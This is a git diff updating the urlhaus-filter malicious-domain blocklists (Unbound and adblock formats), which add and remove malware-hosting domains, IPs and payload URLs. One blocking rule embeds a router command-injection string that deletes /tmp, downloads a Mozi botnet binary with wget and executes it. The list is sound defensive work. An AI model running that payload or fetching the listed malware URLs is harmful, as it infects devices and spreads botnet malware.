always_nxdomain local-zone: "news.omumusic.net" always_nxdomain local-zone: "newsun-shop.com" always_nxdomain +local-zone: "ngoaingu.garage.com.vn" always_nxdomain local-zone: "nofound.000webhostapp.com" always_nxdomain local-zone: "norperuinge.com.pe" always_nxdomain local-zone: "nprg.ru" always_nxdomain @@ -376,7 +388,6 @@ local-zone: "pcsoori.com" always_nxdomain local-zone: "pedidoslalacteo.com.ar" always_nxdomain local-zone: "perfectshinehair.co.uk" always_nxdomain local-zone: "ph4s.ru" always_nxdomain -local-zone: "phamchilong.com" always_nxdomain local-zone: "phudieusongma.com" always_nxdomain local-zone: "pink99.com" always_nxdomain local-zone: "poisss.jhfddd.com" always_nxdomain @@ -385,7 +396,6 @@ local-zone: "ppl.ac.id" always_nxdomain local-zone: "prestigehomeautomation.net" always_nxdomain local-zone: "probost.cz" always_nxdomain local-zone: "prosoc.nl" always_nxdomain -local-zone: "protestlabsmovings.es" always_nxdomain local-zone: "prowin.co.th" always_nxdomain local-zone: "pujashoppe.in" always_nxdomain local-zone: "purelondonhyg.com" always_nxdomain @@ -417,7 +427,6 @@ local-zone: "ruisgood.ru" always_nxdomain local-zone: "rusch.nu" always_nxdomain local-zone: "s.51shijuan.com" always_nxdomain local-zone: "s.kk30.com" always_nxdomain -local-zone: "s289428.smrtp.ru" always_nxdomain local-zone: "saboorjaam.ir" always_nxdomain local-zone: "sadiqgill.com" always_nxdomain local-zone: "sahathaikasetpan.com" always_nxdomain @@ -438,6 +447,7 @@ local-zone: "simlun.com.ar" always_nxdomain local-zone: "sinastorage.cn" always_nxdomain local-zone: "sindicato1ucm.cl" always_nxdomain local-zone: "skyscan.com" always_nxdomain +local-zone: "sl9XA73g7u3EO07WT42n7f4vIn5fZH.biz" always_nxdomain local-zone: "small-business-solutions.biz" always_nxdomain local-zone: "small.962.net" always_nxdomain local-zone: "smccycles.com" always_nxdomain @@ -462,8 +472,8 @@ local-zone: "swwbia.com" always_nxdomain local-zone: "symanreni.mysecondarydns.com" always_nxdomain local-zone: "szxypt.com" always_nxdomain local-zone: "t.honker.info" always_nxdomain -local-zone: "tandenblekenhoofddorp.nl" always_nxdomain local-zone: "tattooartcreations.com" always_nxdomain +local-zone: "taxpos.com" always_nxdomain local-zone: "tcy.198424.com" always_nxdomain local-zone: "tehrenberg.com" always_nxdomain local-zone: "telescopelms.com" always_nxdomain @@ -476,6 +486,7 @@ local-zone: "thc-annex.com" always_nxdomain local-zone: "theprestige.ro" always_nxdomain local-zone: "theptiendat.com" always_nxdomain local-zone: "therecruiter.io" always_nxdomain +local-zone: "thorn-bikes.com" always_nxdomain local-zone: "thosewebbs.com" always_nxdomain local-zone: "tianangdep.com" always_nxdomain local-zone: "tibinst.mefound.com" always_nxdomain @@ -484,12 +495,12 @@ local-zone: "tishreycarmelim.co.il" always_nxdomain local-zone: "tonydong.com" always_nxdomain local-zone: "tonyzone.com" always_nxdomain local-zone: "totebarreto.com.br" always_nxdomain +local-zone: "tribunal.ug" always_nxdomain local-zone: "tsd.jxwan.com" always_nxdomain local-zone: "tulli.info" always_nxdomain local-zone: "tuneup.ibk.me" always_nxdomain local-zone: "tutuler.com" always_nxdomain local-zone: "uc-56.ru" always_nxdomain -local-zone: "ucto-id.cz" always_nxdomain local-zone: "ugc.wegame.com.cn" always_nxdomain local-zone: "ukks.net" always_nxdomain local-zone: "ukronet.ru" always_nxdomain @@ -503,13 +514,16 @@ local-zone: "urquilam.com.ar" always_nxdomain local-zone: "usd-gold.com" always_nxdomain local-zone: "uskeba.ca" always_nxdomain local-zone: "usmadetshirts.com" always_nxdomain +local-zone: "uytgvhdfsdxc.ug" always_nxdomain local-zone: "vadyur.github.io" always_nxdomain local-zone: "valedchap.ir" always_nxdomain local-zone: "valencaagora.com.br" always_nxdomain local-zone: "vaziri.echobit.ir" always_nxdomain +local-zone: "veyron.ir" always_nxdomain local-zone: "vfocus.net" always_nxdomain local-zone: "videoswebcammsn.free.fr" always_nxdomain local-zone: "vitinhvnt.com" always_nxdomain +local-zone: "wap.dosame.com" always_nxdomain local-zone: "warriorllc.com" always_nxdomain local-zone: "wbd.5636.com" always_nxdomain local-zone: "webarte.com.br" always_nxdomain @@ -526,7 +540,6 @@ local-zone: "wsg.com.sg" always_nxdomain local-zone: "www2.recepty5.com" always_nxdomain local-zone: "x2vn.com" always_nxdomain local-zone: "xantinas.com" always_nxdomain -local-zone: "xpodip.ir" always_nxdomain local-zone: "xtremeforumz.com" always_nxdomain local-zone: "yeez.net" always_nxdomain local-zone: "yesky.51down.org.cn" always_nxdomain @@ -537,6 +550,9 @@ local-zone: "yy31t.chokun.ru" always_nxdomain local-zone: "zagruz.dnset.com" always_nxdomain local-zone: "zagruz.toh.info" always_nxdomain local-zone: "zagruz.zyns.com" always_nxdomain +local-zone: "zaragoza.co.ug" always_nxdomain +local-zone: "zaragozsa.ug" always_nxdomain +local-zone: "zd4b.lonlyfafner.ru" always_nxdomain local-zone: "zdy.17110.com" always_nxdomain local-zone: "zeytinyagisabun.com" always_nxdomain local-zone: "zhetysu360.kz" always_nxdomain diff --git a/urlhaus-filter-unbound.conf b/urlhaus-filter-unbound.conf index 77c6d7fe..d6fe608a 100644 --- a/urlhaus-filter-unbound.conf +++ b/urlhaus-filter-unbound.conf @@ -1,5 +1,5 @@ # Title: Malicious Domains Unbound Blocklist -# Updated: Sun, 12 Jul 2020 12:09:57 UTC +# Updated: Mon, 13 Jul 2020 00:09:51 UTC # Expires: 1 day (update frequency) # Repo: https://gitlab.com/curben/urlhaus-filter # License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3752,6 +3752,8 @@ local-zone: "alexfranco.co" always_nxdomain local-zone: "alexgarkavenko.com" always_nxdomain local-zone: "alexhhh.chat.ru" always_nxdomain local-zone: "alexis.monville.com" always_nxdomain +local-zone: "alexliasko.co.ug" always_nxdomain +local-zone: "alexliasko.ug" always_nxdomain local-zone: "alexm.co.za" always_nxdomain local-zone: "alexovicsattila.com" always_nxdomain local-zone: "alexpopow.com" always_nxdomain @@ -15204,6 +15206,7 @@ local-zone: "clicklenderz.com" always_nxdomain local-zone: "clicknaranja.mx" always_nxdomain local-zone: "clickneat.be" always_nxdomain local-zone: "clicknit.com" always_nxdomain +local-zone: "clickon.vn" always_nxdomain local-zone: "clickprintnow.com.au" always_nxdomain local-zone: "clickripplesolutions.in" always_nxdomain local-zone: "clicksbyayush.com" always_nxdomain @@ -18223,7 +18226,6 @@ local-zone: "dato.co.at" always_nxdomain local-zone: "datongsafe-taipei.org.tw" always_nxdomain local-zone: "datos.com.tw" always_nxdomain local-zone: "datos.com.ua" always_nxdomain -local-zone: "datphatlocsg.com" always_nxdomain local-zone: "datpq.com" always_nxdomain local-zone: "datrangsuc.com" always_nxdomain local-zone: "datrephuquoc.net" always_nxdomain @@ -21346,7 +21348,6 @@ local-zone: "dpacorp.org" always_nxdomain local-zone: "dparmm1.wci.com.ph" always_nxdomain local-zone: "dpbh.info" always_nxdomain local-zone: "dpbusinessportal.ro" always_nxdomain -local-zone: "dpcservizi.it" always_nxdomain local-zone: "dpe.com.tw" always_nxdomain local-zone: "dpeasesummithilltoppers.pbworks.com" always_nxdomain local-zone: "dpersonnel.ru" always_nxdomain @@ -24343,7 +24344,6 @@ local-zone: "esitsecurity.com" always_nxdomain local-zone: "eskaledoor.com" always_nxdomain local-zone: "eskandarb.com" always_nxdomain local-zone: "eskeleco.ir" always_nxdomain -local-zone: "eskenazo.cl" always_nxdomain local-zone: "eski.elt.com.tr" always_nxdomain local-zone: "eskilloo.com" always_nxdomain local-zone: "eskimue.de" always_nxdomain @@ -41663,7 +41663,6 @@ local-zone: "library8.bimvimdan.tk" always_nxdomain local-zone: "libreentreprisemagazine.com" always_nxdomain local-zone: "libroglobale.bid" always_nxdomain local-zone: "librores.press" always_nxdomain -local-zone: "librusfan.ru" always_nxdomain local-zone: "libtech.com.au" always_nxdomain local-zone: "libya-info.com" always_nxdomain local-zone: "libyabeach.tk" always_nxdomain @@ -44363,6 +44362,7 @@ local-zone: "mambaddd4.ru" always_nxdomain local-zone: "mambilerzonaldistrict.tk" always_nxdomain local-zone: "mameradirastislavice.sk" always_nxdomain local-zone: "maminsecret.ru" always_nxdomain +local-zone: "mammalson.com" always_nxdomain local-zone: "mammothstraw.com" always_nxdomain local-zone: "mamnonmangnondanang.edu.vn" always_nxdomain local-zone: "mamnontohienthanh.com" always_nxdomain @@ -49093,7 +49093,6 @@ local-zone: "nannyservices101.com" always_nxdomain local-zone: "nano40.com" always_nxdomain local-zone: "nanobiteuae.com" always_nxdomain local-zone: "nanobrain.co.kr" always_nxdomain -local-zone: "nanodigestmag.com" always_nxdomain local-zone: "nanodivulga.ufn.edu.br" always_nxdomain local-zone: "nanogagliato.com" always_nxdomain local-zone: "nanohair.com.au" always_nxdomain @@ -50818,6 +50817,7 @@ local-zone: "novaland.cl" always_nxdomain local-zone: "novamentemagra.com.br" always_nxdomain local-zone: "novametal.cl" always_nxdomain local-zone: "novaoptica.pt" always_nxdomain +local-zone: "novapisa.com" always_nxdomain local-zone: "novaplaza.com" always_nxdomain local-zone: "novaproductionsomaha.com" always_nxdomain local-zone: "novaprotravel.com" always_nxdomain @@ -54757,7 +54757,6 @@ local-zone: "playstationgame.tk" always_nxdomain local-zone: "playtech.ddnsking.com" always_nxdomain local-zone: "playtech.id" always_nxdomain local-zone: "playthefinancialgame.com" always_nxdomain -local-zone: "playvideo.site" always_nxdomain local-zone: "plaza-beauty.ru" always_nxdomain local-zone: "plazacolibri.com.mx" always_nxdomain local-zone: "plazadomino.com" always_nxdomain @@ -60538,7 +60537,6 @@ local-zone: "salezietes.lt" always_nxdomain local-zone: "salght.com" always_nxdomain local-zone: "salheshthemovie.com" always_nxdomain local-zone: "salientbrands.com" always_nxdomain -local-zone: "salifkeita.net" always_nxdomain local-zone: "salimoni.ru" always_nxdomain local-zone: "saling-klimatyzacje.pl" always_nxdomain local-zone: "salinzada.com" always_nxdomain @@ -69900,7 +69898,6 @@ local-zone: "thuyluckhinen.com.vn" always_nxdomain local-zone: "thuysankv1.com" always_nxdomain local-zone: "thuysinhlongthanh.com" always_nxdomain local-zone: "thuytienacademy.com" always_nxdomain -local-zone: "thyamasr.com" always_nxdomain local-zone: "thymedentalcare.com" always_nxdomain local-zone: "thyroidnutritioneducators.com" always_nxdomain local-zone: "thyrsi.com" always_nxdomain @@ -70181,6 +70178,7 @@ local-zone: "tk-pikpg.sch.id" always_nxdomain local-zone: "tk-spectrans.ru" always_nxdomain local-zone: "tkalniaobrazu.pl" always_nxdomain local-zone: "tkaystore.com" always_nxdomain +local-zone: "tkb.com.tw" always_nxdomain local-zone: "tkbc.co.za" always_nxdomain local-zone: "tkbhaktimulya.web.id" always_nxdomain local-zone: "tkconcept.vn" always_nxdomain diff --git a/urlhaus-filter.txt b/urlhaus-filter.txt index 5b86734a..449acf50 100644 --- a/urlhaus-filter.txt +++ b/urlhaus-filter.txt @@ -1,5 +1,5 @@ ! Title: Malicious URL Blocklist -! Updated: Sun, 12 Jul 2020 12:09:57 UTC +! Updated: Mon, 13 Jul 2020 00:09:51 UTC ! Expires: 1 day (update frequency) ! Repo: https://gitlab.com/curben/urlhaus-filter ! License: https://creativecommons.org/publicdomain/zero/1.0/ @@ -3633,6 +3633,7 @@ ||113.133.228.23^ ||113.133.228.30^ ||113.133.228.60^ +||113.133.228.85^ ||113.133.228.91^ ||113.133.229.149^ ||113.133.229.185^ @@ -4341,6 +4342,7 @@ ||114.234.121.63^ ||114.234.123.92^ ||114.234.125.12^ +||114.234.129.202^ ||114.234.130.210^ ||114.234.131.130^ ||114.234.133.189^ @@ -4390,6 +4392,7 @@ ||114.234.194.48^ ||114.234.195.112^ ||114.234.195.62^ +||114.234.195.71^ ||114.234.195.96^ ||114.234.205.180^ ||114.234.209.152^ @@ -4840,6 +4843,7 @@ ||114.239.46.197^ ||114.239.46.52^ ||114.239.46.81^ +||114.239.48.65^ ||114.239.49.169^ ||114.239.49.180^ ||114.239.49.236^ @@ -7812,6 +7816,7 @@ ||117.63.20.242^ ||117.63.20.92^ ||117.63.226.148^ +||117.63.247.13^ ||117.63.51.128^ ||117.63.69.253^ ||117.63.72.213^ @@ -9216,6 +9221,7 @@ ||122.174.253.72^ ||122.175.245.171^ ||122.176.115.28^ +||122.176.39.179^ ||122.176.72.49^ ||122.176.74.247^ ||122.176.94.96^ @@ -14480,6 +14486,7 @@ ||162.212.112.206^ ||162.212.112.208^ ||162.212.112.209^ +||162.212.112.211^ ||162.212.112.213^ ||162.212.112.216^ ||162.212.112.218^ @@ -15428,6 +15435,7 @@ ||167.71.200.228^ ||167.71.208.165^ ||167.71.210.82^ +||167.71.213.57^ ||167.71.214.117^ ||167.71.216.150^ ||167.71.216.201^ @@ -16168,6 +16176,7 @@ ||172.36.18.201^ ||172.36.18.216^ ||172.36.18.220^ +||172.36.18.248^ ||172.36.18.255^ ||172.36.18.41^ ||172.36.18.84^ @@ -17058,6 +17067,7 @@ ||172.39.10.185^ ||172.39.10.232^ ||172.39.11.0^ +||172.39.11.138^ ||172.39.11.179^ ||172.39.11.213^ ||172.39.11.23^ @@ -17873,6 +17883,7 @@ ||172.45.21.76^ ||172.45.22.172^ ||172.45.23.154^ +||172.45.23.180^ ||172.45.23.241^ ||172.45.23.7^ ||172.45.23.86^ @@ -17933,6 +17944,7 @@ ||172.45.32.186^ ||172.45.32.209^ ||172.45.32.57^ +||172.45.32.74^ ||172.45.32.9^ ||172.45.34.188^ ||172.45.35.11^ @@ -20072,6 +20084,7 @@ ||180.116.234.94^ ||180.116.238.134^ ||180.116.238.136^ +||180.116.238.144^ ||180.116.238.199^ ||180.116.238.75^ ||180.116.255.241^ @@ -24418,6 +24431,7 @@ ||189.140.86.168^ ||189.140.87.238^ ||189.141.102.137^ +||189.141.130.30^ ||189.145.192.124^ ||189.147.248.169^ ||189.148.182.221^ @@ -25438,6 +25452,7 @@ ||194.15.36.245^ ||194.15.36.246^ ||194.15.36.255^ +||194.15.36.37^ ||194.15.36.41^ ||194.15.36.42^ ||194.15.36.43^ @@ -26078,6 +26093,7 @@ ||199.83.203.122^ ||199.83.203.123^ ||199.83.203.127^ +||199.83.203.131^ ||199.83.203.132^ ||199.83.203.134^ ||199.83.203.137^ @@ -28589,6 +28605,7 @@ ||218.161.125.23^ ||218.161.127.50^ ||218.161.14.154^ +||218.161.23.184^ ||218.161.23.33^ ||218.161.23.94^ ||218.161.3.200^ @@ -29711,6 +29728,7 @@ ||221.227.252.50^ ||221.227.7.32^ ||221.228.159.3^ +||221.229.144.191^ ||221.229.178.227^ ||221.229.181.157^ ||221.229.181.224^ @@ -29750,6 +29768,7 @@ ||221.5.30.191^ ||221.5.30.223^ ||221.5.30.228^ +||221.5.30.247^ ||221.5.30.56^ ||221.5.31.113^ ||221.5.31.165^ @@ -31447,6 +31466,7 @@ ||27.158.250.188^ ||27.158.250.196^ ||27.158.250.199^ +||27.158.250.210^ ||27.158.250.219^ ||27.158.250.2^ ||27.158.250.43^ @@ -31524,6 +31544,7 @@ ||27.41.134.187^ ||27.41.134.217^ ||27.41.134.3^ +||27.41.135.16^ ||27.41.135.170^ ||27.41.135.173^ ||27.41.135.19^ @@ -31545,6 +31566,7 @@ ||27.41.142.190^ ||27.41.142.198^ ||27.41.142.51^ +||27.41.143.216^ ||27.41.143.79^ ||27.41.144.66^ ||27.41.145.113^ @@ -32996,6 +33018,7 @@ ||36.33.128.76^ ||36.33.128.7^ ||36.33.129.120^ +||36.33.129.122^ ||36.33.132.139^ ||36.33.132.206^ ||36.33.132.89^ @@ -33970,6 +33993,7 @@ ||41.86.19.200^ ||41.86.21.56^ ||41.86.21.5^ +||41.86.21.60^ ||41.86.251.38^ ||41.89.94.30^ ||41.92.186.135^ @@ -36400,6 +36424,7 @@ ||45.63.111.27^ ||45.63.2.149^ ||45.63.30.20^ +||45.63.54.207^ ||45.63.55.136^ ||45.63.55.68^ ||45.63.59.67^ @@ -37716,6 +37741,7 @@ ||49.119.94.82^ ||49.119.95.99^ ||49.12.11.16^ +||49.12.32.67^ ||49.143.126.72^ ||49.143.32.36^ ||49.143.32.43^ @@ -38149,6 +38175,7 @@ ||49.81.35.201^ ||49.81.35.249^ ||49.81.35.30^ +||49.81.40.23^ ||49.81.41.46^ ||49.81.45.177^ ||49.81.46.194^ @@ -39634,6 +39661,7 @@ ||58.243.20.136^ ||58.243.20.165:43481/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1&next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://58.243.20.165:43481/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1$all ||58.243.20.165^ +||58.243.20.168^ ||58.243.20.194^ ||58.243.20.197^ ||58.243.20.212^ @@ -40515,6 +40543,7 @@ ||61.145.194.51^ ||61.145.194.53^ ||61.147.44.192^ +||61.147.48.95^ ||61.147.66.239^ ||61.153.168.81^ ||61.153.168.8^ @@ -41449,6 +41478,7 @@ ||62.16.36.130^ ||62.16.36.72^ ||62.16.36.99^ +||62.16.37.183^ ||62.16.37.33^ ||62.16.38.36^ ||62.16.39.52^ @@ -45650,6 +45680,7 @@ ||99.162.250.24^ ||99.198.127.106^ ||99.2.198.29^ +||99.232.224.138^ ||99.3.72.74^ ||99.36.238.25^ ||99.44.138.176^ @@ -48145,6 +48176,8 @@ ||alexhhh.chat.ru^ ||alexis.monville.com^ ||alexlema.com/css/a1/Mail_Access_Logs.doc$all +||alexliasko.co.ug^ +||alexliasko.ug^ ||alexm.co.za^ ||alexovicsattila.com^ ||alexpopow.com^ @@ -60979,12 +61012,7 @@ ||clicknaranja.mx^ ||clickneat.be^ ||clicknit.com^ -||clickon.vn/4OLLC/SMA85328097TDTRQJ/Aug-09-2018-501831082/QAHH-KYD$all -||clickon.vn/4OLLC/SMA85328097TDTRQJ/Aug-09-2018-501831082/QAHH-KYD/$all -||clickon.vn/WellsFargo/com/Personal/Aug-15-2018$all -||clickon.vn/WellsFargo/com/Personal/Aug-15-2018/$all -||clickon.vn/newsletter/US/Statement/ACCOUNT1148735$all -||clickon.vn/newsletter/US/Statement/ACCOUNT1148735/$all +||clickon.vn^ ||clickprintnow.com.au^ ||clickripplesolutions.in^ ||clicksbyayush.com^ @@ -64128,7 +64156,7 @@ ||datongsafe-taipei.org.tw^ ||datos.com.tw^ ||datos.com.ua^ -||datphatlocsg.com^ +||datphatlocsg.com/wp-content/uploads/2020/05/scfcgmbjsv/77777.png$all ||datpq.com^ ||datrangsuc.com^ ||datrephuquoc.net^ @@ -68558,7 +68586,8 @@ ||dpaste.com/2PYZNZK.txt$all ||dpbh.info^ ||dpbusinessportal.ro^ -||dpcservizi.it^ +||dpcservizi.it/wp-content/themes/danfe/mojhxsriuysl/01678/EmploymentVerification_01678_05072020.zip$all +||dpcservizi.it/wp-content/themes/danfe/mojhxsriuysl/EmploymentVerification_964803_05072020.zip$all ||dpe.com.tw^ ||dpeasesummithilltoppers.pbworks.com^ ||dpersonnel.ru^ @@ -84240,7 +84269,7 @@ ||eskaledoor.com^ ||eskandarb.com^ ||eskeleco.ir^ -||eskenazo.cl^ +||eskenazo.cl/wp-content/Transaktion/01_19/$all ||eski.elt.com.tr^ ||eskilloo.com^ ||eskimue.de^ @@ -102690,7 +102719,7 @@ ||libreentreprisemagazine.com^ ||libroglobale.bid^ ||librores.press^ -||librusfan.ru^ +||librusfan.ru/271vNHA$all ||libtech.com.au^ ||libya-info.com^ ||libyabeach.tk^ @@ -105492,6 +105521,7 @@ ||mambilerzonaldistrict.tk^ ||mameradirastislavice.sk^ ||maminsecret.ru^ +||mammalson.com^ ||mammothstraw.com^ ||mamnonmangnondanang.edu.vn^ ||mamnontohienthanh.com^ @@ -110583,7 +110613,8 @@ ||nano40.com^ ||nanobiteuae.com^ ||nanobrain.co.kr^ -||nanodigestmag.com^ +||nanodigestmag.com/De_de/OVVCWPO0725313/de/DETAILS/$all +||nanodigestmag.com/PayPal/Orders_details/012019/$all ||nanodivulga.ufn.edu.br^ ||nanogagliato.com^ ||nanohair.com.au^ @@ -112428,11 +112459,7 @@ ||novamentemagra.com.br^ ||novametal.cl^ ||novaoptica.pt^ -||novapisa.com/fvtrri/04631/NQAD_04631_01062020.zip$all -||novapisa.com/fvtrri/46681/NQAD_46681_01062020.zip$all -||novapisa.com/fvtrri/57917818/nqad_57917818_01062020.zip$all -||novapisa.com/fvtrri/NQAD_63015261_01062020.zip$all -||novapisa.com/fvtrri/NQAD_8170916_01062020.zip$all +||novapisa.com^ ||novaplaza.com^ ||novaproductionsomaha.com^ ||novaprotravel.com^ @@ -122732,7 +122759,8 @@ ||playtech.ddnsking.com^ ||playtech.id^ ||playthefinancialgame.com^ -||playvideo.site^ +||playvideo.site/docs_8kj/81588387/Judgement_04222020_81588387.zip$all +||playvideo.site/docs_8kj/Judgement_04222020_0736741.zip$all ||plaza-beauty.ru^ ||plazacolibri.com.mx^ ||plazadomino.com^ @@ -129095,7 +129123,7 @@ ||salght.com^ ||salheshthemovie.com^ ||salientbrands.com^ -||salifkeita.net^ +||salifkeita.net/wp-content/upgrabe/51199672/Darlehensvertrag_51199672_14052020.zip$all ||salimoni.ru^ ||saling-klimatyzacje.pl^ ||salinzada.com^ @@ -140624,7 +140652,9 @@ ||thuysankv1.com^ ||thuysinhlongthanh.com^ ||thuytienacademy.com^ -||thyamasr.com^ +||thyamasr.com/wp-content/themes/danfe/cwratmgm/0173087/LoanAgreement_0173087_05122020.zip$all +||thyamasr.com/wp-content/themes/danfe/cwratmgm/LoanAgreement_000968_05122020.zip$all +||thyamasr.com/wp-content/themes/danfe/cwratmgm/LoanAgreement_2122066_05122020.zip$all ||thymedentalcare.com^ ||thyroidnutritioneducators.com^ ||thyrsi.com^ @@ -140924,7 +140954,7 @@ ||tk-spectrans.ru^ ||tkalniaobrazu.pl^ ||tkaystore.com^ -||tkb.com.tw/tkbNew/images/banner/scan.exe$all +||tkb.com.tw^ ||tkbc.co.za^ ||tkbhaktimulya.web.id^ ||tkconcept.vn^